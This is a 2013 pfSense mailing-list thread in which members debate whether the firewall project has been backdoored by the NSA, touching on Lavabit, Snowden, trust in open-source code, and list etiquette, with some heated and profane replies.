On 2013-10-09 19:42, Adam Thompson wrote: Argh. Anyone who answered Yes to your question (correctly, mind you) would immediately be committing a federal crime. Considering the consequences, no-one in their right mind would ever confirm that they had been approached or received a NSL. Well, some people do, because they have principles and values and prefer to not bow to any suppressors; for example Ladar Levison of Lavabit (https://en.wikipedia.org/wiki/Lavabit). He could just had have complied and he would still run his company today - offering encrypted email to his customers, that in reality is not really encrypted anymore; but he chose to stand up and blow the whistle. Great guy. Regards Thinker Rix ___ List mailing list List@lists.pfsense.org http://lists.pfsense.org/mailman/listinfo/list
Re: [pfSense] NSA: Is pfSense infiltrated by big brother NSA or others?
To answer your question about throwing the first stone. Your question reads a bit like the Are you a criminal/commie? questions. Many people would object to the question at the start because it implies that the people being asked the question has done something wrong. Watching the reactions to political debates shows that asking the question can be enough to get a sizable amount of the audience to think the answer is yes, even when no proof is ever given that something happened. Then when the question was deleted, you demanded that pfSense take a stand on it. Let me show you what it looks like from the other side: Have you planned to overthrow the government? When will you show that you are not plotting to kill your fellow country men? It is a simple question, when will we here something from you? I just ask because I want to be sure that you are not trying to kill me. For the tool in question, pfSense, once you start questioning it, there is no way to get the bottom without eithering trusting the pfSense people (which means that the question is pointless because if you trust them, asking them if they have violated your trust means that you don't trust them) or getting an external validation (trusting another group of people or doing the work yourself). FYI, there is a long history on the Internet of people asking simple innocent question, not to get actually answers, but to cause trouble by causing the effect described at the beginning of my email (these are called trolls). Walter On Wed, Oct 9, 2013 at 11:31 AM, Thinker Rix thinke...@rocketmail.comwrote: On 2013-10-09 20:22, Jim Thompson wrote: On Oct 9, 2013, at 7:13 PM, Thinker Rix thinke...@rocketmail.com wrote: Hello Jim! On 2013-10-09 19:50, Jim Thompson wrote: IMO, this bullshit thread only serves to assist those asking the question in stroking their own ego. This is already the second time that you insult me indirectly. It’s amusing that you don’t understand that you threw the first stone here. This is correct. I do not understand where I am supposed to have thrown any stones or insult anybody, indeed. If you would like to show me, I would really be thankful. May I ask again if you are an staff member of Electric Sheep Fencing LLC? Staff members get paid. I’m a co-owner, and have never taken a dime from ESF (or BSDP). jim Thank you for the info. Regards Thinker Rix __**_ List mailing list List@lists.pfsense.org http://lists.pfsense.org/**mailman/listinfo/listhttp://lists.pfsense.org/mailman/listinfo/list -- The greatest dangers to liberty lurk in insidious encroachment by men of zeal, well-meaning but without understanding. -- Justice Louis D. Brandeis ___ List mailing list List@lists.pfsense.org http://lists.pfsense.org/mailman/listinfo/list
Re: [pfSense] NSA: Is pfSense infiltrated by big brother NSA or others?
On Wed, Oct 09, 2013 at 07:17:25PM +0200, Jim Thompson wrote: Sorry, this is not BS. The situation has changed, and we have to adapt. The situation did not change with the Snowden revelations. Anyone following along has known what was going on for at least the last decade. The difference is between having a theory, or having it confirmed by evidence. The disclosures changed the confidence level of a large number of people, some of the cryptographers, security professionals, or in general people concerned with opsec, and forced them into finally doing something. That is a net good thing. At the very least, we'll get a lot more of hardened systems overall, especially where it matters. The only thing that has changed is that now outrage has become popular. Outrage by itself is useless, unless it's an amplifier, and results in political action, or at least increases the activism background. How many of you people now questioning pfSense understand that Edward Snowden despised classified leaks in back in 2009, and that he was not always the champion of transparency that he has apparently become. Thank you for this information. It doesn't really matter about the origins of the leaks, or the motivation behind it, true or professed, just the end result. ArsTechnica published IRC chats where he railed against a New York Times story about the U.S. rejecting an Israeli request for aid to attack an Iranian nuclear site and the United States' covert efforts to sabotage Iran's nuclear program. Are they TRYING to start a war? Jesus christ. they're like wikileaks, he said in the chat. they're just reporting, dude, said another user. moreover, who the fuck are the anonymous sources telling them this? he said. those people should be shot in the balls. Snowden, in the chat, also criticized reporting on classified information: is it unethical to report on the government's intrigue? asked a user in the chat. VIOLATING NATIONAL SECURITY? no. he responded. meh. national security. responded the user. Um, YS.that shit is classified for a reason, he said. it's not because oh we hope our citizens don't find out. it's because this shit won't work if iran knows what we're doing. I am so angry right now. This is completely unbelievable, Snowden said. http://arstechnica.com/tech-policy/2013/06/exclusive-in-2009-ed-snowden-said-leakers-should-be-shot-then-he-became-one/3/ It doesn’t contribute anything to the project. It clarifies a few things. Please don't knee-jerk about it, this is not going to improve things in any way. So “be a pussy” is your answer to handle this? No need to know. I don't know on what kind of the fence you are, but you're being a part of the project, and it's important to meet the right tone when responding to inquiries, even if you consider them meritless. ___ List mailing list List@lists.pfsense.org http://lists.pfsense.org/mailman/listinfo/list
Re: [pfSense] NSA: Is pfSense infiltrated by big brother NSA or others?
On 2013-10-09 20:16, Gé Weijers wrote: I think it's unlikely that ESF was even asked to cooperate, but I don't believe a denial is all that useful under the circumstances, and asking for it again and again is obnoxious. Having thought about it again and again, I would like to feedback to you that your act of calling it obnoxious to pose as simple question about if a security software project is still secure or has been undermined by the government already, seems to be a clear indication of self-censorship... Self-censorship is what you get, when you suppress peoples by surveillance.. ___ List mailing list List@lists.pfsense.org http://lists.pfsense.org/mailman/listinfo/list
Re: [pfSense] NSA: Is pfSense infiltrated by big brother NSA or others?
You got your answer of no a while back. But you're still talking. What are you going to do with the answer now that you have it? What's YOUR plan? -Ian On Wed, Oct 9, 2013 at 2:55 PM, Thinker Rix thinke...@rocketmail.comwrote: On 2013-10-09 20:16, Gé Weijers wrote: I think it's unlikely that ESF was even asked to cooperate, but I don't believe a denial is all that useful under the circumstances, and asking for it again and again is obnoxious. Having thought about it again and again, I would like to feedback to you that your act of calling it obnoxious to pose as simple question about if a security software project is still secure or has been undermined by the government already, seems to be a clear indication of self-censorship... Self-censorship is what you get, when you suppress peoples by surveillance.. __**_ List mailing list List@lists.pfsense.org http://lists.pfsense.org/**mailman/listinfo/listhttp://lists.pfsense.org/mailman/listinfo/list ___ List mailing list List@lists.pfsense.org http://lists.pfsense.org/mailman/listinfo/list
Re: [pfSense] NSA: Is pfSense infiltrated by big brother NSA or others?
On Wed, Oct 09, 2013 at 07:53:24PM +0200, Jim Thompson wrote: Also, the source of git would also reveal a problem when examined. To get around that one starts hypothesizing the sort of globe-spanning conspiracy against which one might as well give up (well, maybe all my compilers (not just gcc, all of them) are also backdoored to backdoor themselves, and each other if you cross-compile, then backdoor git too...”). Yeah, we know our Ken Thompson and about the (known) attempted backdoor insertions. pfSense is based on FreeBSD. What if FreeBSD was backdoored by the NSA or other? How would you know? pfSense is a great deal more than FreeBSD. If you want to reduce the attack surface, or just amount of machinery to review, less is definitely more. /tmp/rules.debug is small enough to eyeball and deploy somewhere else. That else will be increasingly involving really open hardware, and compartments formally verified (see seL4 Co). See? just useless ego stroking, and a lot of resultant heat, rather than solutions to problems. Can we get back to pfSense now? I'm interested into building a trustable network tap, to get a good feel of what goes on my networks. Apart from the usual mirrored switch port (and reliance on whatever the firmware is professing it is doing) how can pfSense help me with that? It used to have a transparent bridge mode, is that still in there somewhere? ___ List mailing list List@lists.pfsense.org http://lists.pfsense.org/mailman/listinfo/list
Re: [pfSense] NSA: Is pfSense infiltrated by big brother NSA or others?
On 2013-10-09 22:11, Ian Bowers wrote: You got your answer of no a while back. But you're still talking. What are you going to do with the answer now that you have it? What's YOUR plan? -Ian - Well, actually it was not s long ago that I got a clear answer - Commonly I talk as much as i like to - I still don't know what to do with the answer - I have no plan Thinker Rix ___ List mailing list List@lists.pfsense.org http://lists.pfsense.org/mailman/listinfo/list
Re: [pfSense] NSA: Is pfSense infiltrated by big brother NSA or others?
On 10/9/13 11:56 AM, Thinker Rix wrote: 1. Recently they forced the small encrypted-email-service Lavabit to comply with them (hand out their SSL-masterkeys install a black-box at their premises). Lavabit did not agree - and they shut him down. Actually they didn't shut him down. Per news reports and the founder's statements. You can read the details and fact if you want. David ___ List mailing list List@lists.pfsense.org http://lists.pfsense.org/mailman/listinfo/list
Re: [pfSense] NSA: Is pfSense infiltrated by big brother NSA or others?
Hi Walter, On 2013-10-09 21:53, Walter Parker wrote: To answer your question about throwing the first stone. Your question reads a bit like the Are you a criminal/commie? questions. Many people would object to the question at the start because it implies that the people being asked the question has done something wrong. Watching the reactions to political debates shows that asking the question can be enough to get a sizable amount of the audience to think the answer is yes, even when no proof is ever given that something happened. Interesting what all kinds of different things you do interpret into my question. By my comprehension I just asked simple but important question and did this quite straight-forwardly. Then when the question was deleted, you demanded that pfSense take a stand on it. Yes. Censorship always raises questions. Let me show you what it looks like from the other side: Have you planned to overthrow the government? When will you show that you are not plotting to kill your fellow country men? It is a simple question, when will we here something from you? I just ask because I want to be sure that you are not trying to kill me. Well, your example neglects one important aspect: pfSense is a kind of security software project. Asking it about it's level of security and integrity is a question that such a project must stand, IMHO. It is like asking a bank how safe my money is. Or asking Microsoft how good Word is for writing letters; while asking me about if I plan to overthrow some government or kill other people refers to nothing. For the tool in question, pfSense, once you start questioning it, there is no way to get the bottom without eithering trusting the pfSense people (which means that the question is pointless because if you trust them, asking them if they have violated your trust means that you don't trust them) or getting an external validation (trusting another group of people or doing the work yourself). I guess for anybody related to computer security it is a must to question anything anytime and take nothing for granted. You should question everything any time and any player in this domain should accept any questions any time, IMHO. FYI, there is a long history on the Internet of people asking simple innocent question, not to get actually answers, but to cause trouble by causing the effect described at the beginning of my email (these are called trolls). What trouble do you refer to? I only read some aggressive/ snappy answers which - frankly - I find pretty awkward reactions to my simple question. Regards Thinker Rix ___ List mailing list List@lists.pfsense.org http://lists.pfsense.org/mailman/listinfo/list
Re: [pfSense] NSA: Is pfSense infiltrated by big brother NSA or others?
Is ideas on how to secure yourself and your network the sort of thing you're looking for? A plan or a sense of direction, something like that? Because you've been focusing on things that do achieve these ends. How can the pfSense community help you solve your pfSense related problem, or was it just a question you had that has since been answered? -Ian On Wed, Oct 9, 2013 at 4:14 PM, Thinker Rix thinke...@rocketmail.comwrote: On 2013-10-09 22:11, Ian Bowers wrote: You got your answer of no a while back. But you're still talking. What are you going to do with the answer now that you have it? What's YOUR plan? -Ian - Well, actually it was not s long ago that I got a clear answer - Commonly I talk as much as i like to - I still don't know what to do with the answer - I have no plan Thinker Rix __**_ List mailing list List@lists.pfsense.org http://lists.pfsense.org/**mailman/listinfo/listhttp://lists.pfsense.org/mailman/listinfo/list ___ List mailing list List@lists.pfsense.org http://lists.pfsense.org/mailman/listinfo/list
Re: [pfSense] NSA: Is pfSense infiltrated by big brother NSA or others?
All, Can this flame be put to an end or continued via private mail? This endless discussion would be reason for me to unsubscribe and that's not the goal of the list i guess. Regards, Pim On 9 okt. 2013, at 22:26, Thinker Rix wrote: Hi Walter, On 2013-10-09 21:53, Walter Parker wrote: To answer your question about throwing the first stone. Your question reads a bit like the Are you a criminal/commie? questions. Many people would object to the question at the start because it implies that the people being asked the question has done something wrong. Watching the reactions to political debates shows that asking the question can be enough to get a sizable amount of the audience to think the answer is yes, even when no proof is ever given that something happened. Interesting what all kinds of different things you do interpret into my question. By my comprehension I just asked simple but important question and did this quite straight-forwardly. Then when the question was deleted, you demanded that pfSense take a stand on it. Yes. Censorship always raises questions. Let me show you what it looks like from the other side: Have you planned to overthrow the government? When will you show that you are not plotting to kill your fellow country men? It is a simple question, when will we here something from you? I just ask because I want to be sure that you are not trying to kill me. Well, your example neglects one important aspect: pfSense is a kind of security software project. Asking it about it's level of security and integrity is a question that such a project must stand, IMHO. It is like asking a bank how safe my money is. Or asking Microsoft how good Word is for writing letters; while asking me about if I plan to overthrow some government or kill other people refers to nothing. For the tool in question, pfSense, once you start questioning it, there is no way to get the bottom without eithering trusting the pfSense people (which means that the question is pointless because if you trust them, asking them if they have violated your trust means that you don't trust them) or getting an external validation (trusting another group of people or doing the work yourself). I guess for anybody related to computer security it is a must to question anything anytime and take nothing for granted. You should question everything any time and any player in this domain should accept any questions any time, IMHO. FYI, there is a long history on the Internet of people asking simple innocent question, not to get actually answers, but to cause trouble by causing the effect described at the beginning of my email (these are called trolls). What trouble do you refer to? I only read some aggressive/ snappy answers which - frankly - I find pretty awkward reactions to my simple question. Regards Thinker Rix ___ List mailing list List@lists.pfsense.org http://lists.pfsense.org/mailman/listinfo/list ___ List mailing list List@lists.pfsense.org http://lists.pfsense.org/mailman/listinfo/list
Re: [pfSense] NSA: Is pfSense infiltrated by big brother NSA or others?
But, your initial question was not What level of security and integrity is provided by pfSense? or How do judge the safety and security of pfSense? Your question was Has pfSense been compromised by Big Brother? In the context of your Bank question it reads more like Have you been robbed yet? or Are you working with crooks? and not How safe is my money? For Microsoft it reads How broken is Word, not How good is Word? Or closer to the question Are you in bed with the NSA, not How safe are are Word documents from others? Most people are happy to engage in questions of the form Tell about what your product does to solve/fix the problem? and consider questions of the form Have you sold out to the NSA? or How broken is your product? to be insulting. I ask you How broken are you? It is a simple question, what is your response? Do you feel at all insulted by that question. You seem to be missing the idea that the context of the question matters. Do some research on the parse Have you stopped beating your wife yet? and tell me if you would be upset if someone asked you that question. Walter On Wed, Oct 9, 2013 at 1:26 PM, Thinker Rix thinke...@rocketmail.comwrote: Hi Walter, On 2013-10-09 21:53, Walter Parker wrote: To answer your question about throwing the first stone. Your question reads a bit like the Are you a criminal/commie? questions. Many people would object to the question at the start because it implies that the people being asked the question has done something wrong. Watching the reactions to political debates shows that asking the question can be enough to get a sizable amount of the audience to think the answer is yes, even when no proof is ever given that something happened. Interesting what all kinds of different things you do interpret into my question. By my comprehension I just asked simple but important question and did this quite straight-forwardly. Then when the question was deleted, you demanded that pfSense take a stand on it. Yes. Censorship always raises questions. Let me show you what it looks like from the other side: Have you planned to overthrow the government? When will you show that you are not plotting to kill your fellow country men? It is a simple question, when will we here something from you? I just ask because I want to be sure that you are not trying to kill me. Well, your example neglects one important aspect: pfSense is a kind of security software project. Asking it about it's level of security and integrity is a question that such a project must stand, IMHO. It is like asking a bank how safe my money is. Or asking Microsoft how good Word is for writing letters; while asking me about if I plan to overthrow some government or kill other people refers to nothing. For the tool in question, pfSense, once you start questioning it, there is no way to get the bottom without eithering trusting the pfSense people (which means that the question is pointless because if you trust them, asking them if they have violated your trust means that you don't trust them) or getting an external validation (trusting another group of people or doing the work yourself). I guess for anybody related to computer security it is a must to question anything anytime and take nothing for granted. You should question everything any time and any player in this domain should accept any questions any time, IMHO. FYI, there is a long history on the Internet of people asking simple innocent question, not to get actually answers, but to cause trouble by causing the effect described at the beginning of my email (these are called trolls). What trouble do you refer to? I only read some aggressive/ snappy answers which - frankly - I find pretty awkward reactions to my simple question. Regards Thinker Rix __**_ List mailing list List@lists.pfsense.org http://lists.pfsense.org/**mailman/listinfo/listhttp://lists.pfsense.org/mailman/listinfo/list -- The greatest dangers to liberty lurk in insidious encroachment by men of zeal, well-meaning but without understanding. -- Justice Louis D. Brandeis ___ List mailing list List@lists.pfsense.org http://lists.pfsense.org/mailman/listinfo/list
Re: [pfSense] NSA: Is pfSense infiltrated by big brother NSA or others?
On 2013-10-09 23:43, Pim van Stam wrote: All, Can this flame be put to an end or continued via private mail? This endless discussion would be reason for me to unsubscribe and that's not the goal of the list i guess. Regards, Pim Hi Pim, first of all: Generally - sorry for disturbing you. But: Interpreting your message, I guess you are participating at this mailing list with a mail reader that just pours all incoming mail into one folder - which is not the proper way to read mailing lists. Please let me inform you that it is highly advisable to participate at mailing lists only with a mail reader that allows you to view incoming mail in threaded mode. This way you only get to read messages that interest you, instead of being flooded by all messages of all users with all subjects. Not using such a threaded-capable reader but telling others what to write and what not because you are bored about what they discuss is not really a solution :-) A reader that is capable of threaded view mode is e.g. Mozilla Thunderbird (View Sort by Threaded) Regards Thinker Rix ___ List mailing list List@lists.pfsense.org http://lists.pfsense.org/mailman/listinfo/list
Re: [pfSense] NSA: Is pfSense infiltrated by big brother NSA or others?
On Thu, 10 Oct 2013 00:05:22 +0300 Thinker Rix thinke...@rocketmail.com wrote: Well, actually I started this thread with a pretty frank, straight-forward and very simple question. That's right and they were justified. BTW, you pushed to the corner the (un)famous American hubris (Obama: US is exceptional.), that's the nasty answers from some. Thinker Rix, you are not alone at your unease pressing you to ask those questions about pfSense and NSA. Regards to all. Przemysław Pawełczyk -- Home network based on pfSense 2.1. pgpGkBt8vlxDS.pgp Description: PGP signature ___ List mailing list List@lists.pfsense.org http://lists.pfsense.org/mailman/listinfo/list
Re: [pfSense] NSA: Is pfSense infiltrated by big brother NSA or others?
@Chris L i am not responsible, if you didn't get it. if one comes to me with worries about an completely free open source system by using an Closed Source SHIT. this is ridoculous He should first consider his Closed Source Shit. Now i find also his nick misleading, he should name NON-Thinker! he should make his name a honor by doing himself the favor and use his brain. Get this out of the pfSense lists. This is a support list and not an philosophers corner what everything is bad in the world. SUPPORT LIST for pfSense. GET IT just to point it out: ppl. whose are supporting closed source software are also supporting the NSA and all the other kind of shit. As long as one uses closed source software he should shut the fuck up. As long as one uses the internet he should shut the fuck up. As long as one uses TCP/IP he should shut the fuck up. As long one is using Smartphones, Credit-Cards, Onlinebanking, Online-shops and so on shut the fuck up. if one cannot understand why: Internet - invented by DARPA TCP/IP - invented by DARPA RSA encryption - financed by DARPA/NSA/Government alternatives: invent a new internet including a new internet protocol and all the stuff around it. otoh he is to late. he missed the important points. the leaked informations about Xkeysystem are from 2005 or 2008, huuuhaa and now they all whine. if your holyness mr snowden wouldn't be such a hero, you wouldn't even know, care or worry about it. so this is entirely ridiculous. one more time. where are you been as it was important to care about it? eh? at the times we warned the people, nobody would listen and called us those who warned them: paranoid. everyone uses high technologized stuff without to have any clue about how this works, if ppl. like us told them: learn this stuff, it can be dangerous the answer was: naahh thats not important, i know what i am doing. you are paranoid, nobody would ever do so. i see. and now they come and whine ...pah *lol* this has nothing to do with head meet sand. may be, your head should get out of the sand. ridiculous. this entire thematics is ridicoulus. = = = http://michael-schuh.net/ = = = Projektmanagement - IT-Consulting - Professional Services IT Rev. Michael Schuhhttp://dudeism.com/ordcertificate?ordname=Michael+Schuhorddate=05/20/2012 *Ordained Dudeist Priest http://dudeism.com/* Postfach 10 21 52 66021 Saarbrücken phone: 0681/8319664 @: m i c h a e l . s c h u h @ g m a i l . c o m = = = Ust-ID: DE251072318 = = = 2013/10/10 Chris L c...@viptalk.net On Oct 9, 2013, at 9:06 PM, Michael Schuh michael.sc...@gmail.com wrote: ridiculous Head, meet sand. Then again, consider the country of origin. They have a history of not recognizing naked tyranny and evil until it's far too late. They will be in good company with all the apologists for the current American surveillance state. vvv From: Thinker Rix thinke...@rocketmail.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:17.0) Gecko/20130801 Thunderbird/17.0.8 = = = http://michael-schuh.net/ = = = Projektmanagement - IT-Consulting - Professional Services IT Rev. Michael Schuh Ordained Dudeist Priest Postfach 10 21 52 66021 Saarbrücken phone: 0681/8319664 @: m i c h a e l . s c h u h @ g m a i l . c o m = = = Ust-ID: DE251072318 = = = 2013/10/10 Chris Buechler c...@pfsense.org On Wed, Oct 9, 2013 at 9:20 AM, Thinker Rix thinke...@rocketmail.com wrote: Dear pfsense-team, today I posted the following on your blog at http://blog.pfsense.org/?p=712 “Worried User Says: Your comment is awaiting moderation. October 9th, 2013 at 7:55 am Hi guys, I want to ask if you have been approached by any US government officials, such as NSA, FBI, etc. and been asked/ forced to include any backdoors, spyware, loggers, etc. into pfsense and if you did so. Thank you Worried User” Some minutes later I could see that my entry was not released to the public - but deleted by the moderator, without any further comment. Not true, the comment was moderator approved. The only reason we have moderation at all is because spam significantly outnumbers legit comments and we don't want any spam on any of our sites, there isn't some vast conspiracy going on. No, we have not been approached by anyone to backdoor or otherwise compromise security of the project, at any point during our 9 year history. I have indeed met with the NSA in person related to the product of one of our rebrand customers a couple years back, one of their groups was interested in evaluating the product. It survived their security analysis quite well (at least from what they declassified and